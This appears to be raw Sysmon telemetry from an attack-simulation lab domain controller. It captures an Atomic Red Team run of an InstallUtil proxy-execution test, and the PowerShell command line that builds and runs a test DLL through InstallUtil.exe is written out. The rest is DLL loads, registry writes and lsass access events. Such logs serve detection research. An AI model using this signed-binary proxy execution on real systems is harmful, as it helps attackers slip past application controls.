+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a29fc(wow64) 10341000x800000000000000057594218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.104{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057594217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.104{8B6011A9-A320-618E-85FC-04000000F101}26405252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 154100x800000000000000057594216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.118{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /logtoconsole=false C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A320-618E-85FC-04000000F101}2640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/logfile= /logtoconsole=false `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil class constructor execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 534500x800000000000000057595865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.090{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057595864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.074{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Servd1dec626#\367b724a8a8d7a8816e8029637e9af91\System.ServiceModel.Internals.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.ServiceModel.Internals.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.ServiceModel.Internals.dllMD5=D9D712B2F98C74C18C71B40FBFF12C72,SHA256=C1CB9C1223FFBBFA879B7972A34AD437C308829152CFF855802A6350C75B46A7false-Unavailable 734700x800000000000000057595863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.074{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\SMDiagnostics\32788288a07982cb10ab4196907ef578\SMDiagnostics.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSMDiagnostics.dllMicrosoft® .NET FrameworkMicrosoft CorporationSMDiagnostics.dllMD5=6520C012D5164F22C0A4F96E82F7979A,SHA256=BD1F07E923DBA63862A75A4D312268EFF3391C155C1103B20964DF8F7E21D5C1false-Unavailable 11241100x800000000000000057595862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.074{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallState2021-11-12 17:23:45.166 23542300x800000000000000057595861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.074{8B6011A9-A36D-618E-99FC-04000000F101}9496ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallStateMD5=8340E57C6861AA09B7AC38E04EE8E33D,SHA256=A9E636FFAA636D4FDA92BCEE8422B7ABF8ABCF0BCF5FF860CEAF23E327FE0B21falsetrue 734700x800000000000000057595860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.074{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057595859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057595858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057595857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057595856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057595855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057595854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057595853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057595852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057595851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057595849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057595848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057595846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.059{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057595845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057595844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057595843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057595842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057595841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057595840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057595839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057595838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057595837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057595836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057595835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057595834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057595833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057595832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057595831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.043{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057595830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057595829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057595828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057595827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 